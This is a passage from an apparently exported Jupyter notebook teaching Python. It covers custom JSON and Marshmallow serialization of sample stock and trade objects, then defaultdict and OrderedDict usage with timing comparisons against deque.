                    obj[key] = self.parse_financials(value)
        elif isinstance(obj, list):
            for index, item in enumerate(obj):
                obj[index] = self.parse_financials(item)
        return obj

Let's recall our serialized data first:

In [16]:
print(encoded)

{
  "quotes": [
    {
      "symbol": "TSLA",
      "date": "2018-11-22",
      "open": "338.19",
      "high": "338.64",
      "low": "337.60",
      "close": "338.19",
      "volume": 365607,
      "object": "Stock"
    },
    {
      "symbol": "AAPL",
      "date": "2018-11-22",
      "open": "176.66",
      "high": "177.25",
      "low": "176.64",
      "close": "176.78",
      "volume": 3699184,
      "object": "Stock"
    },
    {
      "symbol": "MSFT",
      "date": "2018-11-22",
      "open": "103.25",
      "high": "103.48",
      "low": "103.07",
      "close": "103.11",
      "volume": 4493689,
      "object": "Stock"
    }
  ],
  "trades": [
    {
      "symbol": "TSLA",
      "timestamp": "2018-11-22T10:05:12",
      "order": "buy",
      "price": "338.25",
      "volume": 100,
      "commission": "9.99",
      "object": "Trade"
    },
    {
      "symbol": "AAPL",
      "timestamp": "2018-11-22T10:30:05",
      "order": "sell",
      "price": "177.01",
      "volume": 20

In [17]:
decoded = loads(encoded, cls=CustomDecoder)

In [18]:
decoded

{'quotes': [<__main__.Stock at 0x10c4df550>,
  <__main__.Stock at 0x10c4b6400>,
  <__main__.Stock at 0x10c4b6be0>],
 'trades': [<__main__.Trade at 0x10c4b6e48>, <__main__.Trade at 0x10c4b6978>]}

How can we check of the two objects are "equal"? The problem is that we did not define equality for `Stock` and `Trade` objects, so we cannot compare two instances of the same class and expect equality even if they have the same data. We need to define that first!
Let's do that:

In [19]:
class Stock:
    def __init__(self, symbol, date_, open_, high, low, close, volume):
        self.symbol = symbol
        self.date = date_
        self.open = open_
        self.high = high
        self.low = low
        self.close = close
        self.volume = volume
        
    def as_dict(self):
        return dict(symbol=self.symbol, 
                    date=self.date,
                    open=self.open,
                    high=self.high,
                    low=self.low,
                    close=self.close,
                    volume=self.volume)
    
    def __eq__(self, other):
        return isinstance(other, Stock) and self.as_dict() == other.as_dict()
        
class Trade:
    def __init__(self, symbol, timestamp, order, price, volume, commission):
        self.symbol = symbol
        self.timestamp = timestamp
        self.order = order
        self.price = price
        self.commission = commission
        self.volume = volume
        
    def as_dict(self):
        return dict(
            symbol=self.symbol,
            timestamp=self.timestamp,
            order=self.order,
            price=self.price,
            volume=self.volume,
            commission=self.commission)
    
    def __eq__(self, other):
        return isinstance(other, Trade) and self.as_dict() == other.as_dict()

In [20]:
activity = {
    "quotes": [
        Stock('TSLA', date(2018, 11, 22), 
              Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), Decimal('338.19'), 365_607),
        Stock('AAPL', date(2018, 11, 22), 
              Decimal('176.66'), Decimal('177.25'), Decimal('176.64'), Decimal('176.78'), 3_699_184),
        Stock('MSFT', date(2018, 11, 22), 
              Decimal('103.25'), Decimal('103.48'), Decimal('103.07'), Decimal('103.11'), 4_493_689)
    ],
    
    "trades": [
        Trade('TSLA', datetime(2018, 11, 22, 10, 5, 12), 'buy', Decimal('338.25'), 100, Decimal('9.99')),
        Trade('AAPL', datetime(2018, 11, 22, 10, 30, 5), 'sell', Decimal('177.01'), 20, Decimal('9.99'))
    ]
}

In [21]:
encoded = dumps(activity, cls=CustomEncoder)

In [22]:
decoded = loads(encoded, cls=CustomDecoder)

In [23]:
decoded == activity

True

##  Exercise 3 - Solution

Here we want to use Marshmallow to do the serialization and deserialization that we did in Exercises 1 and 2.

In [1]:
class Stock:
    def __init__(self, symbol, date, open_, high, low, close, volume):
        self.symbol = symbol
        self.date = date
        self.open = open_
        self.high = high
        self.low = low
        self.close = close
        self.volume = volume
        
class Trade:
    def __init__(self, symbol, timestamp, order, price, volume, commission):
        self.symbol = symbol
        self.timestamp = timestamp
        self.order = order
        self.price = price
        self.commission = commission
        self.volume = volume

In [2]:
from datetime import date, datetime
from decimal import Decimal

activity = {
    "quotes": [
        Stock('TSLA', date(2018, 11, 22), 
              Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), Decimal('338.19'), 365_607),
        Stock('AAPL', date(2018, 11, 22), 
              Decimal('176.66'), Decimal('177.25'), Decimal('176.64'), Decimal('176.78'), 3_699_184),
        Stock('MSFT', date(2018, 11, 22), 
              Decimal('103.25'), Decimal('103.48'), Decimal('103.07'), Decimal('103.11'), 4_493_689)
    ],
    
    "trades": [
        Trade('TSLA', datetime(2018, 11, 22, 10, 5, 12), 'buy', Decimal('338.25'), 100, Decimal('9.99')),
        Trade('AAPL', datetime(2018, 11, 22, 10, 30, 5), 'sell', Decimal('177.01'), 20, Decimal('9.99'))
    ]
}

I'm first going to define some schemas for trades and stocks:

In [3]:
from marshmallow import Schema, fields

In [4]:
class StockSchema(Schema):
    symbol = fields.Str()
    date = fields.Date()
    open = fields.Decimal()
    high = fields.Decimal()
    low = fields.Decimal()
    close = fields.Decimal()
    volume = fields.Integer()

Let's test this one out quickly:

In [5]:
StockSchema().dump(Stock('TSLA', date(2018, 11, 22), 
                          Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), 
                          Decimal('338.19'), 365_607))

MarshalResult(data={'low': Decimal('337.60'), 'open': Decimal('338.19'), 'close': Decimal('338.19'), 'volume': 365607, 'symbol': 'TSLA', 'high': Decimal('338.64'), 'date': '2018-11-22'}, errors={})

That's great, but there's a slight issue - you'll notice that the marshalled data has `Decimal` objects for our prices. This is still going to be an issue if we try to serialize to JSON:

In [6]:
StockSchema().dumps(Stock('TSLA', date(2018, 11, 22), 
                          Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), 
                          Decimal('338.19'), 365_607))

TypeError: Object of type 'Decimal' is not JSON serializable

So let's fix that:

In [7]:
class StockSchema(Schema):
    symbol = fields.Str()
    date = fields.Date()
    open = fields.Decimal(as_string=True)
    high = fields.Decimal(as_string=True)
    low = fields.Decimal(as_string=True)
    close = fields.Decimal(as_string=True)
    volume = fields.Integer()

In [8]:
StockSchema().dump(Stock('TSLA', date(2018, 11, 22), 
                          Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), 
                          Decimal('338.19'), 365_607)).data

{'low': '337.60',
 'open': '338.19',
 'close': '338.19',
 'volume': 365607,
 'symbol': 'TSLA',
 'high': '338.64',
 'date': '2018-11-22'}

And now we can serialize to JSON:

In [9]:
StockSchema().dumps(Stock('TSLA', date(2018, 11, 22), 
                          Decimal('338.19'), Decimal('338.64'), Decimal('337.60'), 
                          Decimal('338.19'), 365_607)).data

'{"low": "337.60", "open": "338.19", "close": "338.19", "volume": 365607, "symbol": "TSLA", "high": "338.64", "date": "2018-11-22"}'

Let's now handle the `Trade` schema:

In [10]:
class TradeSchema(Schema):
    symbol = fields.Str()
    timestamp = fields.DateTime()
    order = fields.Str()
    price = fields.Decimal(as_string=True)
    commission = fields.Decimal(as_string=True)
    volume = fields.Integer()

In [11]:
TradeSchema().dumps(Trade('TSLA', datetime(2018, 11, 22, 10, 5, 12), 'buy', Decimal('338.25'), 100, Decimal('9.99'))).data

'{"price": "338.25", "volume": 100, "symbol": "TSLA", "order": "buy", "commission": "9.99", "timestamp": "2018-11-22T10:05:12+00:00"}'

Now let's write a schema for our overall dictionary that contains a list of Trades and a list of Quotes:

In [12]:
class ActivitySchema(Schema):
    trades = fields.Nested(TradeSchema, many=True)
    quotes = fields.Nested(StockSchema, many=True)

And we can now serialize and deserialize:

In [13]:
result = ActivitySchema().dumps(activity, indent=2).data

In [14]:
type(result)

str

In [15]:
print(result)

{
  "trades": [
    {
      "price": "338.25",
      "volume": 100,
      "symbol": "TSLA",
      "order": "buy",
      "commission": "9.99",
      "timestamp": "2018-11-22T10:05:12+00:00"
    },
    {
      "price": "177.01",
      "volume": 20,
      "symbol": "AAPL",
      "order": "sell",
      "commission": "9.99",
      "timestamp": "2018-11-22T10:30:05+00:00"
    }
  ],
  "quotes": [
    {
      "low": "337.60",
      "open": "338.19",
      "close": "338.19",
      "volume": 365607,
      "symbol": "TSLA",
      "high": "338.64",
      "date": "2018-11-22"
    },
    {
      "low": "176.64",
      "open": "176.66",
      "close": "176.78",
      "volume": 3699184,
      "symbol": "AAPL",
      "high": "177.25",
      "date": "2018-11-22"
    },
    {
      "low": "103.07",
      "open": "103.25",
      "close": "103.11",
      "volume": 4493689,
      "symbol": "MSFT",
      "high": "103.48",
      "date": "2018-11-22"
    }
  ]
}


So a JSON string...
Let's deserialize that JSON string:

In [16]:
activity_deser = ActivitySchema().loads(result).data

In [17]:
type(activity_deser)

dict

In [18]:
from pprint import pprint

pprint(activity_deser)

{'quotes': [{'close': Decimal('338.19'),
             'date': datetime.date(2018, 11, 22),
             'high': Decimal('338.64'),
             'low': Decimal('337.60'),
             'open': Decimal('338.19'),
             'symbol': 'TSLA',
             'volume': 365607},
            {'close': Decimal('176.78'),
             'date': datetime.date(2018, 11, 22),
             'high': Decimal('177.25'),
             'low': Decimal('176.64'),
             'open': Decimal('176.66'),
             'symbol': 'AAPL',
             'volume': 3699184},
            {'close': Decimal('103.11'),
             'date': datetime.date(2018, 11, 22),
             'high': Decimal('103.48'),
             'low': Decimal('103.07'),
             'open': Decimal('103.25'),
             'symbol': 'MSFT',
             'volume': 4493689}],
 'trades': [{'commission': Decimal('9.99'),
             'order': 'buy',
             'price': Decimal('338.25'),
             'symbol': 'TSLA',
             'timestamp': datetim

That's looking pretty good, but you'll notice something - the objects in the `trades` and `quotes` list have been loaded into plain dictionary objects, not `Trade` and `Stock` objects:

In [19]:
type(activity_deser['trades'][0])

dict

For this we have to remember to provide functions decorated with `@post_load`:

In [20]:
from marshmallow import post_load

class TradeSchema(Schema):
    symbol = fields.Str()
    timestamp = fields.DateTime()
    order = fields.Str()
    price = fields.Decimal(as_string=True)
    commission = fields.Decimal(as_string=True)
    volume = fields.Integer()
    
    @post_load
    def make_trade(self, data):
        return Trade(**data)

In [21]:
class StockSchema(Schema):
    symbol = fields.Str()
    date = fields.Date()
    open = fields.Decimal(as_string=True)
    high = fields.Decimal(as_string=True)
    low = fields.Decimal(as_string=True)
    close = fields.Decimal(as_string=True)
    volume = fields.Integer()
    
    @post_load()
    def make_stock(self, data):
        return Stock(**data)

And of course we have to redefine our `ActivitySchema` to make sure it is referencing the newly defined sub schema classes:

In [22]:
class ActivitySchema(Schema):
    trades = fields.Nested(TradeSchema, many=True)
    quotes = fields.Nested(StockSchema, many=True)

And now we can try this again:

In [23]:
activity_deser = ActivitySchema().loads(result).data

TypeError: __init__() got an unexpected keyword argument 'open'

So here we have an issue - basically our method to construct a new `Stock` object expects the argument for the open price to be `open_`, and not `open` which is what our schema is producing.

We could do it in one of two ways:

First we can change our method that builds the `Stock` object:

In [24]:
class StockSchema(Schema):
    symbol = fields.Str()
    date = fields.Date()
    open = fields.Decimal(as_string=True)
    high = fields.Decimal(as_string=True)
    low = fields.Decimal(as_string=True)
    close = fields.Decimal(as_string=True)
    volume = fields.Integer()
    
    @post_load()
    def make_stock(self, data):
        data['open_'] = data.pop('open')
        return Stock(**data)

In [25]:
class ActivitySchema(Schema):
    trades = fields.Nested(TradeSchema, many=True)
    quotes = fields.Nested(StockSchema, many=True)

In [26]:
activity_deser = ActivitySchema().loads(result).data

In [27]:
pprint(activity_deser)

{'quotes': [<__main__.Stock object at 0x105e70e80>,
            <__main__.Stock object at 0x105e70eb8>,
            <__main__.Stock object at 0x105e70ef0>],
 'trades': [<__main__.Trade object at 0x105e70c18>,
            <__main__.Trade object at 0x105e70b70>]}


So, let's just recap the various schemas we have to create:

In [28]:
class StockSchema(Schema):
    symbol = fields.Str()
    date = fields.Date()
    open = fields.Decimal(as_string=True)
    high = fields.Decimal(as_string=True)
    low = fields.Decimal(as_string=True)
    close = fields.Decimal(as_string=True)
    volume = fields.Integer()
    
    @post_load()
    def make_stock(self, data):
        data['open_'] = data.pop('open')
        return Stock(**data)
    
class TradeSchema(Schema):
    symbol = fields.Str()
    timestamp = fields.DateTime()
    order = fields.Str()
    price = fields.Decimal(as_string=True)
    commission = fields.Decimal(as_string=True)
    volume = fields.Integer()
    
    @post_load
    def make_trade(self, data):
        return Trade(**data)
    
class ActivitySchema(Schema):
    trades = fields.Nested(TradeSchema, many=True)
    quotes = fields.Nested(StockSchema, many=True)

As you can see this is a whole lot easier than doing it by hand using the standard library.

# Section 09 - Specialized Dictionaries

##  defaultdict

The `defaultdict` is a specialized dictionary found in the `collections` module. (It is a subclass of the `dict` type).

In [1]:
from collections import defaultdict

Standard dictionaries in Python will raise an exception if we try to access a non-existent key:

In [2]:
d = {}

In [3]:
d['a']

KeyError: 'a'

Now, we can certainly use the `.get` method:

In [4]:
result = d.get('a')
type(result)

NoneType

And we can even specify a default value for the key if it is not present:

In [5]:
d.get('a', 0)

0

Often we have dictionaries where we want to return a consistent default value if the requested key does not exist.

Although we can do so using the `.get` method as above, we have to remember to use the same default value every time - plus it gets a little cumbersome.

Let's say we want to keep track of the number of occurrences of individual characters in a string.

We might approach it this way:

In [6]:
counts = {}
sentence = "able was I ere I saw elba"

for c in sentence:
    if c in counts:
        counts[c] += 1
    else:
        counts[c] = 1

In [7]:
counts

{'a': 4, 'b': 2, 'l': 2, 'e': 4, ' ': 6, 'w': 2, 's': 2, 'I': 2, 'r': 1}

So this works, but we have that `if` statement - it would be nice to simplify our code somewhat:

In [8]:
counts = {}
for c in sentence:
    counts[c] = counts.get(c, 0) + 1

In [9]:
counts

{'a': 4, 'b': 2, 'l': 2, 'e': 4, ' ': 6, 'w': 2, 's': 2, 'I': 2, 'r': 1}

So, that works well and is much cleaner. But if we have to specify that default value (`0` in this case) many times in our code when working with the same dictionary, we have to remember what the default needs to be each time.

Instead, we could use a `defaultdict`. In a `defaultdict` we specify what the default value is for a missing key - more precisely, we specify a default factory method that is called:

In [10]:
counts = defaultdict(lambda : 0)

In [11]:
for c in sentence:
    counts[c] += 1

In [12]:
counts

defaultdict(<function __main__.<lambda>()>,
            {'a': 4,
             'b': 2,
             'l': 2,
             'e': 4,
             ' ': 6,
             'w': 2,
             's': 2,
             'I': 2,
             'r': 1})

As you can see that simplified our code quite a bit, but the result is not quite a dictionary - it is a `defaultdict`. However, it inherits from `dict` so all the dictionary methods we have grown to know and love are still available because ` defaultdict` **is** a `dict`:

In [13]:
isinstance(counts, defaultdict)

True

In [14]:
isinstance(counts, dict)

True

And `counts` behaves like a regular dictionary too:

In [15]:
counts.items()

dict_items([('a', 4), ('b', 2), ('l', 2), ('e', 4), (' ', 6), ('w', 2), ('s', 2), ('I', 2), ('r', 1)])

In [16]:
counts['a']

4

The main difference is when we request a non-existent key:

In [17]:
counts['python']

0

We get the default value back - not only that, but it actually created that key as well:

In [18]:
counts

defaultdict(<function __main__.<lambda>()>,
            {'a': 4,
             'b': 2,
             'l': 2,
             'e': 4,
             ' ': 6,
             'w': 2,
             's': 2,
             'I': 2,
             'r': 1,
             'python': 0})

So this is a bit different from using `.get`.

And of course we can manipulate our dictionary just like a standard dictionary:

In [19]:
counts['hello'] = 'world'
counts

defaultdict(<function __main__.<lambda>()>,
            {'a': 4,
             'b': 2,
             'l': 2,
             'e': 4,
             ' ': 6,
             'w': 2,
             's': 2,
             'I': 2,
             'r': 1,
             'python': 0,
             'hello': 'world'})

In [20]:
del counts['hello']
counts

defaultdict(<function __main__.<lambda>()>,
            {'a': 4,
             'b': 2,
             'l': 2,
             'e': 4,
             ' ': 6,
             'w': 2,
             's': 2,
             'I': 2,
             'r': 1,
             'python': 0})

Very often you will see what looks like a **type** specified as the default factory - but keep in mind that it is in fact the corresponding functions (constructors) that are actually being specified.

For example:

In [21]:
int()

0

In [22]:
bool()

False

In [23]:
str()

''

In [24]:
list()

[]

In [25]:
d = defaultdict(int)
d['a']

0

In [26]:
d = defaultdict(bool)
d['a']

False

In [27]:
d = defaultdict(str)
d['a']

''

In [28]:
d = defaultdict(list)
d['a']

[]

Note that this no different than writing:

In [29]:
d = defaultdict(lambda: list())
d['a']

[]

Let's take a look at another example of where a `defaultdict` can be useful.

Suppose we have a dictionary structure that has people's names as keys, and a dictionary for the value that contains the person's eye color. We want to create a dictionary of eye colors, with a list of the people's names that have that eye color:

In [30]:
persons = {
    'john': {'age': 20, 'eye_color': 'blue'},
    'jack': {'age': 25, 'eye_color': 'brown'},
    'jill': {'age': 22, 'eye_color': 'blue'},
    'eric': {'age': 35},
    'michael': {'age': 27}
}

What we want is a dictionary with the eye colors (and `unknown` as the key if the eye color was not specified), and the names of the people with that eye color.

Let's first do this without a `defaultdict`, and also not using `.get`:

In [31]:
eye_colors = {}
for person, details in persons.items():
    if 'eye_color' in details:
        color = details['eye_color']
    else:
        color = 'unknown'
    if color in eye_colors:
        eye_colors[color].append(person)
    else:
        eye_colors[color] = [person]

In [32]:
eye_colors

{'blue': ['john', 'jill'], 'brown': ['jack'], 'unknown': ['eric', 'michael']}

Now let's simplify this by leveraging the `.get` method:

In [33]:
eye_colors = {}
for person, details in persons.items():
    color = details.get('eye_color', 'Unknown')
    person_list = eye_colors.get(color, [])
    person_list.append(person)
    eye_colors[color] = person_list

In [34]:
eye_colors

{'blue': ['john', 'jill'], 'brown': ['jack'], 'Unknown': ['eric', 'michael']}

And finally let's use a `defaultdict`:

In [35]:
eye_colors = defaultdict(list)
for person, details in persons.items():
    color = details.get('eye_color', 'Unknown')
    eye_colors[color].append(person)

In [36]:
eye_colors

defaultdict(list,
            {'blue': ['john', 'jill'],
             'brown': ['jack'],
             'Unknown': ['eric', 'michael']})

When we create a `defaultdict` we have to specify the factory method as the first argument, but thereafter we can specify key/value pairs just like we would with the `dict` constructor (they are basically just passed along to the underlying `dict`):

In [37]:
d = defaultdict(bool, k1=True, k2=False, k3='python')

In [38]:
d

defaultdict(bool, {'k1': True, 'k2': False, 'k3': 'python'})

So, using this, if we had used a `defaultdict` for the Person values, we could simplify our previous example a bit more:

In [39]:
persons = {
    'john': defaultdict(lambda: 'unknown', 
                        age=20, eye_color='blue'),
    'jack': defaultdict(lambda: 'unknown',
                        age=20, eye_color='brown'),
    'jill': defaultdict(lambda: 'unknown',
                        age=22, eye_color='blue'),
    'eric': defaultdict(lambda: 'unknown', age=35),
    'michael': defaultdict(lambda: 'unknown', age=27)
}

In [40]:
eye_colors = defaultdict(list)
for person, details in persons.items():
    eye_colors[details['eye_color']].append(person)

In [41]:
eye_colors

defaultdict(list,
            {'blue': ['john', 'jill'],
             'brown': ['jack'],
             'unknown': ['eric', 'michael']})

It was a little tedious defining that `defaultdict` for every instance in our `persons` dictionary.

This is a good example of where a **partial** function would be really useful. (I cover partial functions in Part 1 of this series, or you can review the documentation here: https://docs.python.org/3.7/library/functools.html#functools.partial

(You can also just use a lambda function as well)

In [42]:
from functools import partial

In [43]:
eyedict = partial(defaultdict, lambda: 'unknown')

Alternatively we could also just define it this way:

In [44]:
eyedict = lambda *args, **kwargs: defaultdict(lambda: 'unknown', *args, **kwargs)

In [45]:
persons = {
    'john': eyedict(age=20, eye_color='blue'),
    'jack': eyedict(age=20, eye_color='brown'),
    'jill': eyedict(age=22, eye_color='blue'),
    'eric': eyedict(age=35),
    'michael': eyedict(age=27)
}

In [46]:
persons

{'john': defaultdict(<function __main__.<lambda>.<locals>.<lambda>()>,
             {'age': 20, 'eye_color': 'blue'}),
 'jack': defaultdict(<function __main__.<lambda>.<locals>.<lambda>()>,
             {'age': 20, 'eye_color': 'brown'}),
 'jill': defaultdict(<function __main__.<lambda>.<locals>.<lambda>()>,
             {'age': 22, 'eye_color': 'blue'}),
 'eric': defaultdict(<function __main__.<lambda>.<locals>.<lambda>()>,
             {'age': 35}),
 'michael': defaultdict(<function __main__.<lambda>.<locals>.<lambda>()>,
             {'age': 27})}

And we can use our previous code just as before:

In [47]:
eye_colors = defaultdict(list)
for person, details in persons.items():
    eye_colors[details['eye_color']].append(person)

In [48]:
eye_colors

defaultdict(list,
            {'blue': ['john', 'jill'],
             'brown': ['jack'],
             'unknown': ['eric', 'michael']})

Let's look at another example where we use a non-deterministic factory. We could make a database call, an API call, and so on. To keep this simple I'm going to use the current time as my default.

In this example we want to keep track of how many times certain functions are being called, as well as when they were **first** called. To do this I want to be able to decorate the functions I want to keep track of, and I want to be able to specify the dictionary that should be used so I can keep a reference to it so I can examine the results.


In [49]:
from collections import defaultdict, namedtuple
from datetime import datetime
from functools import wraps

def function_stats():
    d = defaultdict(lambda: {"count": 0, "first_called": datetime.utcnow()})
    Stats = namedtuple('Stats', 'decorator data')
    
    def decorator(fn):
        @wraps(fn)
        def wrapper(*args, **kwargs):
            d[fn.__name__]['count'] += 1
            return fn(*args, **kwargs)
        return wrapper
    
    return Stats(decorator, d)        

In [50]:
stats = function_stats()

In [51]:
dict(stats.data)

{}

In [52]:
@stats.decorator
def func_1():
    pass

@stats.decorator
def func_2(x, y):
    pass

In [53]:
dict(stats.data)

{}

In [54]:
func_1()

In [55]:
dict(stats.data)

{'func_1': {'count': 1,
  'first_called': datetime.datetime(2018, 12, 29, 22, 43, 48, 828143)}}

In [56]:
func_1()

In [57]:
dict(stats.data)

{'func_1': {'count': 2,
  'first_called': datetime.datetime(2018, 12, 29, 22, 43, 48, 828143)}}

In [58]:
func_2(10, 20)

In [59]:
dict(stats.data)

{'func_1': {'count': 2,
  'first_called': datetime.datetime(2018, 12, 29, 22, 43, 48, 828143)},
 'func_2': {'count': 1,
  'first_called': datetime.datetime(2018, 12, 29, 22, 43, 49, 714090)}}

##  OrderedDict

Prior to Python 3.7, dictionary key order was not guaranteed. This became part of the language in 3.7, so the usefullness of this `OrderedDict` is diminished - but necessary if you want your dictionaries to maintain key order **and** be compatible with Python versions earlier then 3.6 (technically dicts are ordered in 3.6 as well, but it was considered an implementation detail, and not actually guaranteed).

We'll come back to a direct comparison of `OrderedDict` and plain `dict` in a subsequent video. For now let's look at the `OrderedDict` as if we were targeting our code to be compatible with earlier versions of Python.

In [1]:
from collections import OrderedDict

Once again, `OrderedDict` is a subclass of `dict`.

We can also pass keyword arguments to the constructor. However, in Python versions prior to 3.5, the order of the arguments is not guaranteed to be preserved - so to be fully backward-compatible, insert keys into the dictionary **after** you have created it as an empty dictionary.

Let's try it out:

In [2]:
d = OrderedDict()

In [3]:
d['z'] = 'hello'

In [4]:
d['y'] = 'world'

In [5]:
d['a'] = 'python'

In [6]:
d

OrderedDict([('z', 'hello'), ('y', 'world'), ('a', 'python')])

And if we iterate through the keys of the `OrderedDict` we will retain that key order as well:

In [7]:
for key in d:
    print(key)

z
y
a


The `OrderedDict` also supports reverse iteration using `reversed()`:

In [8]:
for key in reversed(d):
    print(key)

a
y
z


This is not the case for a standard dictionary, even in Python 3.5+ where key order is maintained!

In the next video we'll dig a little more into a comparison between `OrderedDicts` and `dicts`.

In [9]:
d = {'a': 1, 'b': 2}
for key in reversed(d):
    print(key)

TypeError: 'dict' object is not reversible

`OrderedDicts` are a subclass of `dicts` so all the usual operations and methods apply, but `OrderedDicts` have a couple of extra methods available to us:
1. `popitem(last=True)`
2. `move_to_end(key, last=True)`

Since an `OrderedDict` has an ordering, it is natural to think of the *first* or *last* element in the dictionary.

The `popitem` allows us to remove the last (by default) or first item (setting `last=False`):

In [10]:
d = OrderedDict()
d['first'] = 10
d['second'] = 20
d['third'] = 30
d['last'] = 40

In [11]:
d

OrderedDict([('first', 10), ('second', 20), ('third', 30), ('last', 40)])

In [12]:
d.popitem()

('last', 40)

In [13]:
d

OrderedDict([('first', 10), ('second', 20), ('third', 30)])

As you can see the last item was popped off (and returned as a key/value tuple). To pop the first item we can do this:

In [14]:
d.popitem(last=False)

('first', 10)

In [15]:
d

OrderedDict([('second', 20), ('third', 30)])

The `move_to_end` method simply moves the specified key to the end (by default), or to the beginning (if `last=False` is specified) of the dictionary:

In [16]:
d = OrderedDict()
d['first'] = 10
d['second'] = 20
d['third'] = 30
d['last'] = 40

In [17]:
d.move_to_end('second')

In [18]:
d

OrderedDict([('first', 10), ('third', 30), ('last', 40), ('second', 20)])

In [19]:
d.move_to_end('third', last=False)

In [20]:
d

OrderedDict([('third', 30), ('first', 10), ('last', 40), ('second', 20)])

Be careful if you specify a non-existent key, you will get an exception:

In [21]:
d.move_to_end('x')

KeyError: 'x'

#### Equality Comparisons

With regular dictionaries, two dictionaries are considered equal (`==`) if they contain the same key/value pairs, irrespective of the ordering.

In [22]:
d1 = {'a': 10, 'b': 20}
d2 = {'b': 20, 'a': 10}

In [23]:
d1 == d2

True

But this is not the case with `OrderedDicts` - since ordering matters here, two `OrderedDicts` will compare equal if both their key/values pairs are equal **and** if the keys are in the same order:

In [24]:
d1 = OrderedDict()
d1['a'] = 10
d1['b'] = 20

d2 = OrderedDict()
d2['a'] = 10
d2['b'] = 20

d3 = OrderedDict()
d3['b'] = 20
d3['a'] = 10


print(d1)
print(d2)
print(d3)

OrderedDict([('a', 10), ('b', 20)])
OrderedDict([('a', 10), ('b', 20)])
OrderedDict([('b', 20), ('a', 10)])


In [25]:
d1 == d2

True

In [26]:
d1 == d3

False

Now, an `OrderedDict` is a subclass of a standard `dict`:

In [27]:
isinstance(d1, OrderedDict)

True

In [28]:
isinstance(d1, dict)

True

So, can we compare an `OrderedDict` with a plain `dict`?

The answer is yes, and in this case order does **not** matter:

In [29]:
d1 = OrderedDict()
d1['a'] = 10
d1['b'] = 20

d2 = {'b': 20, 'a': 10}

print(d1)
print(d2)

OrderedDict([('a', 10), ('b', 20)])
{'b': 20, 'a': 10}


In [30]:
d1 == d2

True

In [31]:
d2 == d1

True

#### Using an OrderedDict as a Stack or Queue

If you are familiar with stacks and queues, you are probably wondering if the `popitem` method means we can effectively use an `OrderedDict` as such data structures.

Well yes, we can, but the real question is whether it is as efficient as using a `deque` for example.

Let's try it out and do some timings:

In [32]:
from timeit import timeit

In [33]:
from collections import deque

In [34]:
def create_ordereddict(n=100):
    d = OrderedDict()
    for i in range(n):
        d[str(i)] = i
    return d

In [35]:
def create_deque(n=100):
    return deque(range(n))   

Now let's time how log it takes to pop off the last element of each data structure repeatedely until the structure is empty.

Instead of testing each time if the structure is empty, I'm going to simply pop items until I get an exception - since I only expect one exception and many many more succesful pop attempts, this will be more efficient:

A `deque` will raise an `IndexError` exception if we attempt to pop an item from an empty `deque`. The `OrderedDict` will raise a `KeyError` exception.

In [36]:
def pop_all_ordered_dict(n=1000, last=True):
    d = create_ordereddict(n)
    while True:
        try:
            d.popitem(last=last)
        except KeyError:
            # done popping
            break           

In [37]:
def pop_all_deque(n=1000, last=True):
    dq = create_deque(n)
    if last:
        pop = dq.pop
    else:
        pop = dq.popleft

    while True:
        try:
            pop()
        except IndexError:
            break


Now let's go ahead and time these operations, both the creations and the pops:

In [38]:
timeit('create_ordereddict(10_000)', 
       globals=globals(), 
       number=1_000)

2.2906384040252306

In [39]:
timeit('create_deque(10_000)', 
       globals=globals(), 
       number=1_000)

0.1509137399843894

Now let's time popping elements - keep in mind that we are also timing the recreation of the data structures every time as well - so our timings are going to be biased because of that. A very rough way of rectifying that will be to subtract how much time we measured above for creating the structures by themselves:

In [40]:
n = 10_000
number = 1_000

results = dict()

results['dict_create'] = timeit('create_ordereddict(n)', 
                                globals=globals(), 
                                number=number)

results['deque_create'] = timeit('create_deque(n)', 
                                 globals=globals(), 
                                 number=number)

results['dict_create_pop_last'] = timeit(
    'pop_all_ordered_dict(n, last=True)',
    globals=globals(), number=number)

results['dict_create_pop_first'] = timeit(
    'pop_all_ordered_dict(n, last=False)',
    globals=globals(), number=number)

results['deque_create_pop_last'] = timeit(
    'pop_all_deque(n, last=True)',
    globals=globals(), number=number
)

results['deque_create_pop_first'] = timeit(
    'pop_all_deque(n, last=False)',
    globals=globals(), number=number
)

results['dict_pop_last'] = (
    results['dict_create_pop_last'] - results['dict_create'])

results['dict_pop_first'] = (
    results['dict_create_pop_first'] - results['dict_create'])

results['deque_pop_last'] = (
    results['deque_create_pop_last'] - results['deque_create'])

results['deque_pop_first'] = (
    results['deque_create_pop_first'] - results['deque_create'])

for key, result in results.items():
    print(f'{key}: {result}')


dict_create: 2.3447022930486128
deque_create: 0.15744277997873724
dict_create_pop_last: 4.827248840010725
dict_create_pop_first: 4.72704964800505
deque_create_pop_last: 0.3677212379989214
deque_create_pop_first: 0.3731844759895466
dict_pop_last: 2.482546546962112
dict_pop_first: 2.382347354956437
deque_pop_last: 0.2102784580201842
deque_pop_first: 0.2157416960108094


As you can see, even though we can certainly use an `OrderedDict` as a stack or queue (and there might be good reasons why we want to use a dictionary for such structures), if you can use a `deque` you will get much faster performance.

One good reason might be if you both need a stack/queue and also need to check for the existence of items frequently - searching a list is very inefficient compared to a dictionary, so depending on your use case the cost of looking up items in a `deque` might be worth the cost of popping/inserting items in an `OrderedDict` instead.

##  OrderedDict vs Python 3.6 Plain Dicts

So, the question, if we are targeting Python 3.6+ is whether we lose anything by not using an `OrderedDict` since plain `dicts` now preserve key order.

As we saw in the previous video there were a few features that `OrderedDicts` offer that `dicts` do not have:

* reverse iteration
* pop first/last item
* move key to beginning/end of dictionary
* equality (`==`) that takes key order into account

We can actually achieve of these things using plain dictionaries, it's just not as straightforward as using the OrdertedDict methods - although I would not be surprised if Python dictionaries eventually get this functionality now that they have a guaranteed key order preservation.

In [40]:
from collections import OrderedDict

#### Reverse Iteration

In [41]:
d1 = OrderedDict(a=1, b=2, c=3, d=4)
d2 = dict(a=1, b=2, c=3, d=4)

In [42]:
print(d1)
print(d2)

OrderedDict([('a', 1), ('b', 2), ('c', 3), ('d', 4)])
{'a': 1, 'b': 2, 'c': 3, 'd': 4}


In [43]:
for k in reversed(d1):
    print(k)

d
c
b
a


This will not work with a plain dictionary, and neither will it work with the views.

But, it looks like this will get implemented in Python 3.8 - https://bugs.python.org/issue33462

For now, it can be done but it means making a list out of the keys, and then iterating through the reversed list:

In [44]:
for k in reversed(list(d2.keys())):
    print(k)

d
c
b
a


